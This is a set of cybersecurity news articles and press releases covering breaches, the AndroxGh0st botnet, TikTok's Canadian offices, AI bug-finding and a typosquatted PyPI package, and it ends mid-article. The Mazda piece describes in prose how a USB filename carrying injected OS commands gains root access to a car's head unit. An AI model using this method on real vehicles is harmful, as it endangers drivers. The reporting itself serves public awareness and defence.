Plus: Hot Topic confirms a customer data breach, Germany arrests a US citizen for allegedly passing military secrets to Chinese intelligence, and more.

Maybe you already heard, but Donald Trump will be president of the United States again. The far-right is celebrating by calling for mass executions. The left is responding with their own election conspiracy theories. Convicted January 6 rioters are banking on a pardon. And women who oppose Trump have frankly had enough.

Ahead of Election Day, WIRED found that an “election integrity” app made by True the Vote, a right-wing group that helped popularize election denialism around the 2020 election, was leaking the emails of its users. In one instance it revealed an election officer in California who appeared to be engaged in illegal voter suppression.

Disinformation and other forms of election interference have been a major issue since Russia’s hack of the Democratic National Committee in the lead-up to the 2016 election. But 2024 appears to have been the worst yet, with US officials warning that Russia had amplified its efforts to unprecedented levels.

In non-election news, Canadian authorities arrested Alexander “Connor” Moucka, who is accused of hacking a slew of Snowflake cloud storage customers earlier this year. Security experts who’ve long followed the exploits of a hacker who went by the handle Waifu—whom authorities say is Moucka—believe him to be “one of the most consequential threat actors of 2024.”

A federal judge in Michigan sentenced Richard Densmore to 30 years in prison after he pleaded guilty to sexually exploiting a child. Densmore was highly active in 764, an online criminal network that the FBI now considers to be a “tier one” terrorism threat.

Finally, in WIRED’s first story published in partnership with 404 Media, reporter (and 404 co-owner) Joseph Cox took a deep dive into the world of infostealer malware—the same kind used in all those Snowflake account breaches Moucka is accused of committing.

And that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Some iPhones that police have in their possession for forensic examination are suddenly rebooting themselves, making it more difficult for investigators to access their contents, reports 404 Media. Police use tools like Cellebrite to essentially hack into phones, but this is typically done when a device is in the so-called After First Unlock (AFU) state. Once they reboot, iPhones are put into Before First Unlock (BFU), which makes them much harder to access with forensic tools.

According to a document obtained by 404, police believed the sudden reboots stemmed from the fact that the devices run iOS 18, Apple’s new mobile operating system. The police suspected that iOS 18 contains a secret feature that allowed the impacted devices, all of which were in airplane mode, to communicate with other nearby iPhones, which sent “a signal to devices to reboot after so much time had transpired since device activity or being off network,” the document reads.

They're half right. 404 reported Friday evening that multiple experts have discovered a new feature in iOS 18 called “inactivity reboot,” which appears to force iPhones to reboot on the fourth day after being locked—no secret signal-sending required. While the feature could help prevent robbers from using stolen iPhones, it's clearly giving the cops a headache, too.

Bad news, kids. The retail chain Hot Topic confirmed this week that it suffered a data breach that exposed the personal information of some 54 million customers. The stolen data includes email addresses for all 54 million people, 25 million “lightly encrypted” credit card numbers, the names, phone numbers, and birthdays of 20 million customers, and even the home addresses of 10 million people. While the hackers behind the breach claimed to have data on far more people than the dataset contains—350 million customers—the exposed data could still be used for identity theft and other malicious activities. Not cool!

Authorities in Germany this week arrested a US citizen for allegedly giving American military secrets to the Chinese government. Identified only as Martin D. due to German privacy laws, prosecutors say he recently “worked for the US armed forces in Germany” and “obtained the information in question during his work with the US armed forces,” according to NBC News. Prosecutors claim that Martin D. “contacted Chinese government agencies and offered to provide them with sensitive US military information for forwarding to a Chinese intelligence service.” Martin D.’s arrest comes just a month after German authorities arrested a woman on suspicion of passing information about arms deliveries to Chinese intelligence.

The FBI is investigating whether Chinese state-backed hackers breached the iPhones of senior staff members in either the Kamala Harris or Donald Trump presidential campaigns, Forbes reports. The CEO of security firm iVerify, Rocky Cole, tells Forbes that his company’s software identified strange changes to the settings on the iPhones of campaign staff “in patterns that are not observed on healthy devices.” (Cole declined to identify which campaign’s staff was impacted.) The FBI told Cole that the affected iPhones belonged to known targets of Chinese hacker group Salt Typhoon, which reportedly breached several US telecom networks including AT&T and Verizon.

Auto-Rebooting iPhones Are Causing Chaos for Cops

Large language models (LLMs) can help app security firms find and fix software vulnerabilities. Malicious actors are on to them too, but here's why defenders may retain the edge.

Source: vs148 via Shutterstock

Security researchers and attackers are turning to AI models to find vulnerabilities, a technology whose use will likely drive the annual count of software flaws higher, but could eventually result in fewer flaws in public releases, experts say.

On Nov. 1, Google said its Big Sleep large language model (LLM) agent discovered a buffer-underflow vulnerability in the popular database engine, SQLite. The experiment shows both the peril and the promise of AI-powered vulnerability discovery tools: The AI agent searched through the code for variations on a specific vulnerability, but identified the software flaw in time for Google to notify the SQLite project and work with them to fix the issue.

Using AI just for software-defect discovery could result in a surge in vulnerability disclosures, but introducing LLM agents into the development pipeline could reverse the trend and lead to fewer software flaws escaping into the wild, says Tim Willis, head of Google's Project Zero, the company's effort to identify zero-day vulnerabilities.

"While we are at an early stage, we believe that the techniques we develop through this research will become a useful and general part of the toolbox that software developers have at their disposal," he says.

Google is not alone in searching for better ways to find — and fix — vulnerabilities. In August, a group of researchers from Georgia Tech, Samsung Research, and other firms — collectively known as Team Atlanta — used an LLM bug-finding system to automatically find and patch a bug in SQLite. And just last month, cybersecurity firm GreyNoise Intelligence revealed it had used its Sift AI system to analyze honeypot logs leading to the discovery and patching of two zero-day vulnerabilities affecting Internet-connected cameras used in sensitive environments.

Overall, companies are gaining more ways to automate vulnerability discovery, and — if they are serious about security — will be able to drive down the number of vulnerabilities in their products by using the tools in development, says Corey Bodzin, chief product officer at GreyNoise Intelligence.

"The exciting thing is we do have technology that allows people who \[care about\] security to be more effective," he says. "Sadly ... there are not many companies where that is ... a primary driver, but even in companies where \[security is\] purely viewed as a cost" can benefit from using these tools.

**Only the First Steps**

Currently, Google's custom approach is still bespoke and requires work to adapt to specific vulnerability-finding tasks. The company's Big Sleep agent does not to look for completely new vulnerabilities, but uses details from a previously discovered vulnerability to look for similar issues. The project has looked at smaller programs with known vulnerabilities as test cases, but the SQLite experiment is the first time they found vulnerabilities in production code, the Google Project Zero and Google DeepMind researchers stated in Google's blog post describing the research.

While specialized fuzzers would likely have found the bug, tuning those tools to perform well is a very manual process, says Google's Willis.

"One promise of \[L\]LM agents is that they might generalize across applications without the need for specialized tuning," he says. "Additionally, we're hopeful that \[L\]LM agents will be able to uncover a different subset of vulnerabilities than those typically found through fuzzing."

The use of AI-based vulnerability discovery tools will be a race between attackers and defenders. Manual code review is a viable way of finding bugs for attackers, who only need a single exploitable vulnerability or short chain of vulnerabilities. But defenders need a scalable way of finding and fixing applications, Willis says. While bug-finding tools can be a force multiplier for both attackers and defenders, the ability to scale up to analyze code will likely be a greater benefit for defenders, Willis says.

"We expect that advances in automated vulnerability discovery, triage, and remediation will disproportionately benefit defenders," he says.

**Focus AI on Finding and Fixing Bugs**

Companies that focus on using AI to generate secure code and fix bugs when found will deliver higher quality code from developers, says Chris Wysopal, co-founder and chief security evangelist at Veracode, an application security firm. He argues that automating bug finding and bug fixing are two completely different problems. Finding vulnerabilities is a very large data problem, whIle fixing bugs usually deals with perhaps a dozen lines of code.

"Once you know the bug is there — if you found it through fuzzing, or through an LLM, or using human code review — and you know what kind of bug it is, fixing it is relatively easy," he says. "So, LLMs favor defenders, because having access to source code and fixing issues is easy. So I'm kind of bullish that we can eliminate whole classes of vulnerabilities, but it's not from finding more, it's from being able to fix more."

Companies that require developers to run automated security tools before code check-in will find themselves on a path to paying down their security debt — the collection of issues that they know about, but have not had time to fix, he says. Currently, about half (46%) of organizations have security debt in the form of persistent critical flaws in applications, according to Veracode's 2024 State of Software Security report.

"The idea that you're committing code that has a problem in it, and it's not fixed, will become the exception, not the rule, like it is today," Wysopal says. "Once you can start to automate this fixing — and we're always getting better at automating finding \[vulnerabilities\] — I think that's how things change."

Yet, the technology will still have to overcome companies' focus on efficiency and productivity over security, says Bob Rudis, vice president of data science and security research at GreyNoise Intelligence. He points to the fixing of the two security vulnerabilities that GreyNoise Intelligence found and responsibly disclosed. The company only fixed the issues in two product models, but not others — despite the fact that the other products likely had similar issues, he says.

Google and GreyNoise Intelligence proved that the technology will work, but whether companies integrate AI into the development pipelines to eliminate bugs is still an open question.

Rudis has doubts.

"I'm sure a handful of organizations are going to deploy it — it's going to make like seven C files a little bit safer across a bunch of organizations, and maybe we'll get like a tick more security for the ones that can actually deploy it properly," he says. "But ultimately, until we actually change the incentive structure around how software vendors build and deploy things, and how consumers actually purchase and deploy and configure things, we are not going to see any benefit."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

AI &amp; LLMs Show Promise in Squashing Software Bugs

It remains unclear how the attackers gained access to Newpark Resources' system, or what they plan to do with any stolen data the strike may have spewed out.

Source: Don Mammoser via Alamy Stock Photo

Newpark Resources, a Texas-based oil drilling fluids system and composite matting systems provider, announced in a filing with the Securities and Exchange Commission (SEC) that it is dealing with the fallout of a ransomware attack it faced earlier this week.

The company has not shared details as to how the attackers gained access to its network, nor who the threat actors are or why they may have targeted Newpark. But after the breach was discovered, Newpark engaged its security response plan as expected and limited access to certain parts of its systems.

"The incident has caused disruptions and limitation of access to certain of the company's information systems and business applications supporting aspects of the company's operations and corporate functions, including financial and operating reporting systems," Newpark said.

According to Matt Hull, global head for Strategic Threat Intelligence at cybersecurity consultancy NCC Group, any data stolen from the critical infrastructure company has not yet appeared on any leak sites.

And because the company reverted to downtime procedures in response to the attack, it was able to continue manufacturing, and its field operations were uninterrupted. It hopes the attack will not have an effect on its financial conditions, it said.

"Organizations are facing an increasingly pressing challenge: maintaining the security benefits of segmentation while enabling controlled connectivity," stated Chris Grove, director of cybersecurity strategy at Nozomi Networks, in an emailed statement to Dark Reading. "Industrial organizations will need to ensure their defenders can quickly isolate and contain threats, while preventing interruptions to critical operations. This is especially important for sectors where downtime has serious consequences in terms of public safety and economic impact, as would be the case with a critical infrastructure sector."

**About the Author**

Mystery Hackers Target Texas Oilfield Supplier in Ransomware Attack

Hackers can exploit critical vulnerabilities in Mazda’s infotainment system, including one that enables code execution via USB, compromising…

Hackers can exploit critical vulnerabilities in Mazda’s infotainment system, including one that enables code execution via USB, compromising your car’s security and putting you at risk.

Cybersecurity researchers at ZDI (Zero Day Initiative) have identified several critical vulnerabilities in Mazda‘s infotainment systems, specifically in the Connectivity Master Unit (CMU) installed in multiple Mazda car models, including the Mazda 3 from the years 2014 to 2021.

These vulnerabilities, caused by “insufficient sanitization” when handling attacker-supplied input, could allow a physically present attacker to exploit them by connecting a specially crafted USB device to the target system. Successful exploitation could result in arbitrary code execution with root privileges.

****The Target****

The CMU unit, manufactured by Visteon Corporation, an anutomotive technology company, and initially developed by Johnson Controls Inc (JCI), runs on the latest available software version (74.00.324A). However, earlier software versions down to at least 70.x may also be affected by these vulnerabilities. The CMU is part of an active “modding scene” where users release software tweaks to alter the unit’s operation, often exploiting such vulnerabilities.

****The Vulnerabilities****

There are multiple vulnerabilities identified in the CMU system. The details of each are as follows:

*   **SQL Injection (CVE-2024-8355/ZDI-24-1208)**: An attacker can inject malicious SQL code by spoofing the iAP serial number of an Apple device. This allows the attacker to manipulate the database, disclose information, create arbitrary files, and potentially execute code.
*   **OS Command Injection (CVE-2024-8359/ZDI-24-1191)**: The REFLASH\_DDU\_FindFile function in the libjcireflashua.so shared object fails to sanitize user input, allowing an attacker to inject arbitrary OS commands that can be executed by the head unit OS shell.
*   **OS Command Injection (CVE-2024-8360/ZDI-24-1192)**: The REFLASH\_DDU\_ExtractFile function in the libjcireflashua. so shared object also fails to sanitize user input, allowing an attacker to inject arbitrary OS commands that can be executed by the head unit OS shell.
*   **Missing Root of Trust in Hardware (CVE-2024-8357/ZDI-24-1189)**: The application SoC is missing any authentication of the bootstrap code, allowing an attacker to manipulate the root filesystem, configuration data, and potentially the bootstrap code itself.
*   **Unsigned Code (CVE-2024-8356/ZDI-24-1188)**: The VIP MCU can be updated with unsigned code, allowing an attacker to pivot from a compromised application SoC running Linux to the VIP MCU and gain direct access to the connected CAN busses of the vehicle.

****Exploitation****

An attacker can exploit these vulnerabilities by creating a file on a FAT32-formatted USB mass storage device with a name that contains the OS commands to be executed. The filename must end with .up for it to be recognized by the software update handling code.

Once the initial compromise is achieved, the attacker can gain persistence through manipulation of the root file system or install a specially crafted VIP microcontroller software allowing unrestricted access to vehicle networks.

****Associated Risks****

According to ZDI’s blog post, the attack chain can be completed in a few minutes in a lab environment, and there is no reason to believe it will take significantly more time against a unit installed in a car.

This means that the vehicle can be compromised while being handled by a valet, during a rideshare, or via USB malware. The CMU can then be compromised and “enhanced” to attempt to compromise any connected device in targeted attacks that can result in DoS, bricking, ransomware, safety compromise, etc. The worst part of it is that these security vulnerabilities remain unpatched.

> _“This research effort and its output highlighted the fact that high-impact vulnerabilities can be found even in a very mature automotive product that has been on the market for a number of years and with a long history of security fixes. To date, these vulnerabilities remain unpatched by the vendor.”_
> 
> ZDI analyst Dmitry Janushkevich 

****Conclusion****

The discovery of these vulnerabilities shows the importance of considering the whole system’s security and security-testing complete production systems in all their operational modes. The use of memory-safe languages or other security tools does not guarantee that deployed systems are secure. It is important to ensure system integrity at all runtime stages and for all components to guarantee downstream security properties of languages and their compilers.

1.  Cybercriminals Exploit CAN Injection Hack to Steal Cars
2.  App Flaw Let Honda and Nissan Cars Hack by Knowing VIN
3.  Tesla cars can be remotely hacked using drone, WIFI dongle
4.  Hackers Remotely Control Kia Cars by Exploiting License Plates
5.  High severity Intel chip flaw left cars and IoT devices vulnerable

Hackers Can Access Mazda Vehicle Controls Via System Vulnerabilities

Canada wants TikTok to dissolve its business in the country. TikTok plans to challenge the decision in court

The Government of Canada ordered the TikTok Technology Canada Inc. to close its offices in the country following a national security review.

This decision was made in accordance with the Investment Canada Act, which allows for the review of foreign investments that may be injurious to Canada’s national security. Canada’s Minister of Innovation, Science and Industry stated:

“As a result of a multi-step national security review process, which involves rigorous scrutiny by Canada’s national security and intelligence community, the Government of Canada has ordered the wind up of the Canadian business carried on by TikTok Technology Canada, Inc. The government is taking action to address the specific national security risks related to ByteDance Ltd.’s operations in Canada through the establishment of TikTok Technology Canada, Inc. The decision was based on the information and evidence collected over the course of the review and on the advice of Canada’s security and intelligence community and other government partners.”

This does not mean Canadians will no longer have access to the popular social media platform. It just means the Chinese owned company will have to close its Canadian operations located in Toronto and Vancouver.

Canada says the decision whether citizens want to use the social media platform is a personal choice but it does encourage Canadians to consult the guidance issued by Communications Security Establishment Canada’s Canadian Centre for Cyber Security to help them assess these risks.

One of the key points of their guidance is the “security over convenience” guideline, which says:

“It may be convenient to have an app always know your location or be able to fetch your photos without approval, but this isn’t the most secure option. Be aware of the features and elements of your device that can be accessed by an app, and make sure you limit permissions.”

Another one that is important in this case is the “consider where your data is being stored” guideline which reminds people to think about which nation’s laws will apply to your information and your activity on the platform.

TikTok responded that:

> “Shutting down TikTok’s Canadian offices and destroying hundreds of well-paying local jobs is not in anyone’s best interest, and today’s shutdown order will do just that. We will challenge this order in court.”

TikTok’s Chinese ownership has brought problems in other countries, as well. In April 2024, Malwarebytes Labs reported on how the US Senate approved a bill that would effectively ban TikTok from the country unless Chinese owner ByteDance gives up its share of the immensely popular app. That law is currently being challenged in court by the popular social media platform.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

 TikTok ordered to close Canada offices following &#8220;national security review&#8221; 

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.
"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a

IoT Security / Vulnerability

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.

"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a new report.

AndroxGh0st is the name given to a Python-based cloud attack tool that's known for its targeting of Laravel applications with the goal of sensitive data pertaining to services like Amazon Web Services (AWS), SendGrid, and Twilio.

Active since at least 2022, it has previously leveraged flaws in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems.

Earlier this March, U.S. cybersecurity and intelligence agencies revealed that attackers are deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."

The latest analysis from CloudSEK reveals a strategic expansion of the targeting focus, with the malware now exploiting an array of vulnerabilities for initial access -

*   CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
*   CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
*   CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
*   CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
*   CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
*   CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
*   CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
*   CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
*   CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
*   CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability

"The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings."

The attacks have also been observed leveraging unauthenticated command execution flaws in Netgear DGN devices and Dasan GPON home routers to drop a payload named "Mozi.m" from different external servers ("200.124.241\[.\]140" and "117.215.206\[.\]216").

Mozi is another well-known botnet that has a track record of striking IoT devices to co-opt them into a malicious network for conducting distributed denial-of-service (DDoS) attacks.

While the malware authors were arrested by Chinese law enforcement officials in September 2021, a precipitous decline in Mozi activity wasn't observed until August 2023, when unidentified parties issued a kill switch command to terminate the malware. It's suspected that either the botnet creators or Chinese authorities distributed an update to dismantle it.

AndroxGh0st's integration of Mozi has raised the possibility of a possible operational alliance, thereby allowing it to propagate to more devices than ever before.

"AndroxGh0st is not just collaborating with Mozi but embedding Mozi's specific functionalities (e.g., IoT infection and propagation mechanisms) into its standard set of operations," CloudSEK said.

"This would mean that AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that otherwise would require separate infection routines."

"If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both AndroxGh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

PRESS RELEASE

Clearwater, Fla. – October 29, 2024 – According to a new AI Opportunity Report from remote connectivity and workplace digitalization solution company TeamViewer, 80% of U.S. business leaders say their organization’s AI adoption is mature, and 65% are sick of the hype and demand practical implementations of AI for their businesses. Leading from the C-suite, 81% of U.S. key decision makers currently use AI at least weekly, up from 60% last year, a notable 35% increase year-over-year. 

Most U.S. business leaders (72%) also agree that AI is vital to improving their organization’s financial outcomes. Along these lines, two-thirds (66%) agree that AI will positively affect revenue over the next year, with respondents saying that the technology makes an average of 249% revenue growth possible. Nearly a quarter of U.S. respondents (23%) believe that not implementing AI technology risks falling behind competitors and 24% foresee increased costs due to a lack of automation.

Successfully integrating AI into remote connectivity support is a prime example of how efficiencies can lead to better financial outcomes. Enter TeamViewer’s new AI-powered Session Insights.

AI-Powered Session Insights 

Aimed at helping IT teams boost efficiency and streamline operations, Session Insights is now being added to TeamViewer’s Tensor remote connectivity solution to automate session documentation and provide analytics, enabling faster handovers and smarter decision-making. By optimizing resources and capturing valuable knowledge, the new capabilities empower IT support teams to resolve issues faster, improve customer satisfaction, and scale expertise, even with limited staff.  

The new features will help internal IT teams better manage employee help desk requests and will also aid customer support teams providing remote assistance to keep their products onsite and customers up and running and aligned with uptime agreements. 

“AI adoption is growing rapidly as businesses increasingly recognize its tangible benefits in driving productivity and streamlining operations. Our research reveals that 81% of decision-makers now engage with AI at least weekly, a substantial rise from last year’s 60%. With the launch of TeamViewer’s new AI-powered Session Insights, we're enabling organizations to make smarter decisions and optimize processes while adhering to the highest security and data privacy standards. We uphold stringent encryption practices to safeguard customer data, ensuring secure processing, while also providing admins the control to enforce company-wide policies and keeping users informed every step of the way,” said Mei Dent, Chief Product and Technology Officer, TeamViewer. 

Trust, Security, Career Advancement & Equality

The report also delves into a variety of other topics gauging business leaders’ current perceptions of AI, including: 

*   Trust in AI: 50% of U.S. business leaders trust AI to act on business forecasts and make business decisions with an impressive 42% trusting AI to make decisions without human oversight.
    
*   Security: 75% of U.S. business leaders are concerned about data management in the use of AI and 67% would consider banning the use of AI outside of the IT team.
    
*   Career Advancement: 75% of U.S. business leaders believe AI is a key skill to enhance their career and 73% say AI has given them the chance to learn new skills they otherwise would not have.
    
*   The Great Equalizer: 72% of U.S. business leaders believe AI can help create equal job opportunities for parents and caregivers while 79% think AI can help increase accessibility in the workplace.
    

With 73% of U.S. respondents believing AI will drive the biggest productivity boom in a century and business leaders reporting that AI saves U.S. IT professionals approximately 16 hours per month, there is clearly huge momentum for increasing AI use in business, including TeamViewer’s AI-powered Session Insights, which integrates with Microsoft Teams and ServiceNow. More information can be found here.  

Survey Methodology 

In The AI Opportunity Report, TeamViewer uncovers the attitudes of 1,400 (500 in the U.S.) information technology, business, and operational technology decision makers towards Artificial Intelligence, across the UK, France, Germany, Australia, Singapore, and the U.S. The research was conducted online by Sapio Research in August and September 2024. 

About TeamViewer

TeamViewer is a leading global technology company that provides a connectivity platform to remotely access, control, manage, monitor, and repair devices of any kind – from laptops and mobile phones to industrial machines and robots. Although TeamViewer is free of charge for private use, it has more than 640,000 subscribers and enables companies of all sizes and from all industries to digitalize their business-critical processes through seamless connectivity. Against the backdrop of global megatrends like device proliferation, automation and new work, TeamViewer proactively shapes digital transformation and continuously innovates in the fields of Augmented Reality, Internet of Things and Artificial Intelligence. Since the company’s foundation in 2005, TeamViewer’s software has been installed on more than 2.5 billion devices around the world. The company is headquartered in Göppingen, Germany, and employs more than 1,500 people globally. In 2023, TeamViewer achieved a revenue of around EUR 627 million. TeamViewer SE (TMV) is listed at Frankfurt Stock Exchange and belongs to the MDAX. Further information can be found at www.teamviewer.com.

Business Leaders Shift to Tangible AI Results, Finds New TeamViewer Study

PRESS RELEASE

TORONTO, Oct. 30, 2024 /PRNewswire/ -- In 2024, Canadian banks have seen just 34% of the reported fraud cases they experienced a year ago. And yet, Canadian retail banking customers appear on pace to lose as much as or more than the $569 million they lost to fraud in 2023 (triple what they lost in 2021). BioCatch – the global leader in digital fraud detection and financial crime prevention powered by behavioral biometric intelligence – says these findings suggest fraudsters have altered their strategies, honing attacks to target fewer Canadians for more money per scam.

"While fraud volumes have decreased significantly over the last year, we're observing an increase in the average value of these cases," BioCatch Director of Global Fraud Intelligence Tom Peacock said. "We can attribute much of this to the rise in social engineering scams in Canada, particularly impersonation scams, which are notoriously higher value than other fraud types. More than 70% of impersonation scam losses in Canada originate from five-figure cases, greatly boosting the country's scam-loss average."

BioCatch's 2024 Digital Banking Fraud Trends in Canada report, also highlights that most Canadian fraud victims are now ages 20-49 instead of 50-89, debunking the common misconception that older people provide easier and more lucrative targets.

"Artificial Intelligence is super-charging fraud," BioCatch Global Advisory Director Seth Ruden said, "compounding its impact, and allowing bad actors to scale and sophisticate their scams with deepfakes and other devices. As the industry deploys the newest authentication methods in both account opening and account takeover processes, fraudsters will undoubtedly attack these as well."

BioCatch also found one in seven scam sessions in Canada showed signs of remote access trojans (RAT), whether active RAT (where the fraudster tricks the victim into granting them control of the session so they can execute the fraud themselves) or passive RAT (where the fraudster guides the victim through payment process).

Click here to access BioCatch's complete 2024 Digital Banking Fraud Trends in Canada report.

BioCatch fraud prevention experts Tom Peacock and Seth Ruden will hold a live conversation about the growth of social engineering scams in Canada and the other latest fraud trends in the country on Nov. 14. To register for that exclusive session, click here.

About BioCatch:

BioCatch stands at the forefront of digital fraud detection, pioneering behavioral biometric intelligence grounded in advanced cognitive science and machine learning. BioCatch analyzes thousands of user interactions to support a digital banking environment where identity, trust, and ease coexist. Today, 32 of the world's largest 100 banks and 210 total financial institutions rely on BioCatch Connect™ to combat fraud, facilitate digital transformation, and grow customer relationships. BioCatch's Client Innovation Board – an industry-led initiative featuring American Express, Barclays, Citi Ventures, HSBC, and National Australia Bank – collaborates to pioneer creative and innovative ways to leverage customer relationships for fraud prevention. With more than a decade of data analysis, 92 registered patents, and unmatched expertise, BioCatch continues to lead innovation to address future challenges. For more information, please visit www.biocatch.com.

Canadians Expected to Lose More Than $569M to Scams in 2024

Questions remain over what a corporate ban will achieve, since Canadians will still be able to use the app.

Source: SOPA Images Limited via Alamy Stock Photo

ByteDance is being exiled from Canada, though the TikTok app is not.

Following the US's example, Canada has spent recent years rubbing up against the world's most popular Chinese app. In February 2023, TikTok was banned from all government devices, citing security concerns. Later that year, the government called for a broader national security review under the 1985 Investment Canada Act, which empowers the government to scrutinize foreign investments.

In concluding that review, the minister of Innovation, Science and Economic Development Canada (ISED) — a federal agency responsible for regulating and supporting various aspects of the country's economy, industry, and scientific endeavors — unveiled a significant, though not comprehensive, development in his country's approach.

To address "specific national security risks," the minister said yesterday, the offices of TikTok Technology Canada Inc. — the Canadian subsidiary of ByteDance, TikTok's parent company — must now be shuttered. However, he noted, the government will not actually block any Canadians from using the app, as "the decision to use a social media application or platform is a personal choice."

**TikTok vs. Governments**

Ever since TikTok blew up during the COVID-19 pandemic, governments worldwide have struggled with how to administer: Ban it, to the chagrin of millions, or don't, and risk consequences to mass privacy and national security.

Concern is widespread that the Chinese Communist Party (CCP) could conduct data gathering and spying through TikTok, since it wields potentially unlimited authority over Chinese companies. And "The CCP has long been known for having an enormous capability to gather otherwise benign-looking datasets, and to process them to produce intelligence to further its national interests," notes Casey Ellis, founder and adviser at Bugcrowd. "While it can easily be argued that Western governments and companies are capable of the same, the CCP's national interests are at best competitive, and at worst disruptive to the national interests of the West."

Blocking the app to prevent CCP data gathering is controversial, however, since it's massively popular, and there is no definitive, significant proof of such malicious activity to date. A few scattered countries have done so (for varying reasons), most notably India in 2020, but most have taken up solutions somewhere in the middle.

In 2020, President Trump signed executive orders effectively forcing ByteDance to sell TikTok to an American company, or else face a national ban. President Biden's No TikTok on Government Devices Act banned the app in government settings, and his Protecting Americans from Foreign Adversary Controlled Applications Act carried the forced sale idea from the Trump administration. US policy is likely to subside now that Trump has been elected again. "Trump has made strong moves against ByteDance in the past," Ellis notes. "He has a reputation for being tough on China, and for operating on the assumption that China is competitive to the US as a great power. I think we'll see more activity around addressing 'creeping threats' from ByteDance and other Chinese companies, particularly those with a larger and established presence, both in the US and amongst its allies, over the coming year."

Meanwhile, in 2023, the Canadian government took parallel actions. And just as it had in the US, TikTok says it will challenge Canada's latest ruling in court.

**What Would Actually Solve TikTok Privacy?**

Debate has now begun over whether banning the corporate half of the TikTok operation will be helpful, if not abjectly harmful to Canada's national security aims.

As Canadian academic Michael Geist argued in a blog post, "banning the company rather than the app may actually make matters worse since the risks associated with the app will remain but the ability to hold the company accountable will be weakened," since it will no longer have a domestic presence. "It is hard to envision it prioritizing (or perhaps even complying) with Canadian regulatory processes if it is banned from formally operating in the jurisdiction."

Dark Reading has asked the ISED for its view of how the ban will benefit Canadian national security. This article will be updated when ISED's response is received.

A separate development poised to directly affect TikTok data collection in Canada is the legislation C-27, which would supersede the Personal Information Protection and Electronic Documents Act, Canada's primary privacy legislation since 2000.

C-27 packages three separate Acts: the Consumer Privacy Protection Act, the bit most relevant for TikTok user privacy; the Electronic Documents Act; and the Artificial Intelligence and Data Act. Though it may be viewed as efficient and ambitious to address so many issues at once, ongoing debates primarily around the artificial intelligence component are currently holding up the passage of the other two along with it.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Canada Closes TikTok Offices, Citing National Security

The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

